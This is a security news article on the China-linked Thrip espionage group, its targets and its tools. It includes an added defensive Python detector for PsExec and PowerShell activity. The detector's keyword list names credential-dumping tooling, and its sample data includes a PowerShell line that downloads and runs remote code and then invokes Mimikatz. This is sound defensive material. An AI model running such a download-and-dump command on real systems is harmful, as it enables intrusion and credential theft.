
China-linked Thrip APT group targets defense and satellite firms

Symantec tracked a new APT group named Thrip that targeted satellite operators, telco companies and defense contractors in the US and Southeast Asia.

Chinese APT groups are always very active. Experts at Symantec have tracked a new APT group named Thrip that has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia.

The Thrip group has been active since 2013, but this is the first time Symantec publicly shared details of its activities.

“We’ve been monitoring Thrip since 2013 when we uncovered a spying campaign being orchestrated from systems based in China. Since our initial discovery, the group has changed its tactics and broadened the range of tools it used. Initially, it relied heavily on custom malware, but in this most recent wave of attacks, which began in 2017, the group has switched to a mixture of custom malware and living off the land tools.” reads the analysis published by Symantec.

Thrip APT used a combination of custom malware and legitimate tools in its attacks. The list of victims is long and includes a satellite communications operator.

The hackers targeted devices involved in operations and infected computers running software that monitors and controls satellites. This circumstance suggests the attackers may also be interested in sabotage, not only in espionage.

Another victim of the group is a company specializing in geospatial imaging and mapping.

“[Thrip] targeted computers running MapXtreme GIS (Geographic Information System) software which is used for tasks such as developing custom geospatial applications or integrating location-based data into other applications. It also targeted machines running Google Earth Server and Garmin imaging software.” continues the analysis.

“The satellite operator wasn’t the only communications target Thrip was interested in. The group had also targeted three different telecoms operators, all based in Southeast Asia.”

The group also targeted three telecoms firms in Southeast Asia and a defense contractor.

The arsenal of the group includes the data stealer Trojan.Rikamanu and its evolution Infostealer.Catchamas, which implements more sophisticated data stealing features and evasion capabilities.

The APT group also used the Trojan.Mycicil, a keylogger that is available for sale on Chinese underground marketplaces, and the Backdoor.Spedear and Trojan.Syndicasec malware.

The Thrip APT also used many legitimate tools, including the Windows Sysinternals utility PsExec, PowerShell, Mimikatz, and the LogMeIn remote access software.
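Living-off-the-land tooling of this kind is hard to catch with file signatures because the binaries are legitimate, so defenders usually fall back on behavioural telemetry. The following is an added example (not from Symantec's report or from Security Affairs) of a small detector that scans Windows event records for two well-known artifacts: the `PSEXESVC` service that PsExec installs on a remote host (System log, Event ID 7045), and PowerShell script blocks (Event ID 4104) that invoke credential-dumping tooling by name. The event records are constructed inline for the example; the field names and the keyword list are assumptions, not fields documented on the page.

```python
"""Flag living-off-the-land activity in Windows event records.

Heuristics (defensive, coarse on purpose):
  * Event ID 7045 (service installed) with ServiceName PSEXESVC: PsExec
    was used to run something on this host remotely.
  * Event ID 4104 (PowerShell script block logging) whose script text
    mentions well-known credential-dumping tooling or an encoded command.
"""
from dataclasses import dataclass
from typing import Iterable, List

# Assumed field layout; real SIEM exports differ, adapt the keys as needed.
@dataclass
class EventRecord:
    event_id: int
    host: str
    fields: dict

# Keywords that appear in script blocks when credential theft tooling is
# loaded through PowerShell. Constructed list for the example.
SUSPICIOUS_PS_TOKENS = ("mimikatz", "sekurlsa", "invoke-mimikatz", "-encodedcommand")


def flag_lotl_events(records: Iterable[EventRecord]) -> List[dict]:
    """Return one finding per record that matches a heuristic."""
    findings = []
    for rec in records:
        if rec.event_id == 7045:
            # PsExec's default remote service name; a renamed service
            # (psexec -r) would evade this exact match, hence 'coarse'.
            if rec.fields.get("ServiceName", "").upper() == "PSEXESVC":
                findings.append({
                    "host": rec.host,
                    "rule": "psexec_service_install",
                    "detail": rec.fields.get("ImagePath", ""),
                })
        elif rec.event_id == 4104:
            script = rec.fields.get("ScriptBlockText", "").lower()
            hits = [t for t in SUSPICIOUS_PS_TOKENS if t in script]
            if hits:
                findings.append({
                    "host": rec.host,
                    "rule": "powershell_credential_tooling",
                    "detail": ",".join(hits),
                })
    return findings


# Constructed sample telemetry: one benign service install, one PsExec
# install, one ordinary PowerShell block, one loading Mimikatz.
SAMPLE_RECORDS = [
    EventRecord(7045, "fileserver01",
                {"ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"}),
    EventRecord(7045, "gis-workstation07",
                {"ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"}),
    EventRecord(4104, "gis-workstation07",
                {"ScriptBlockText": "Get-ChildItem C:\\Maps | Measure-Object"}),
    EventRecord(4104, "gis-workstation07",
                {"ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString($u); Invoke-Mimikatz"}),
]

if __name__ == "__main__":
    for f in flag_lotl_events(SAMPLE_RECORDS):
        print(f"{f['host']}: {f['rule']} ({f['detail']})")
```

The two rules are deliberately narrow: a renamed PsExec service or an obfuscated script block would slip past them, which is why such checks belong alongside Sysmon process-creation and network telemetry rather than replacing it.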

Further details, including IoCs, are reported in the analysis published by Symantec.


Pierluigi Paganini

(Security Affairs – Thrip APT, cyberespionage)

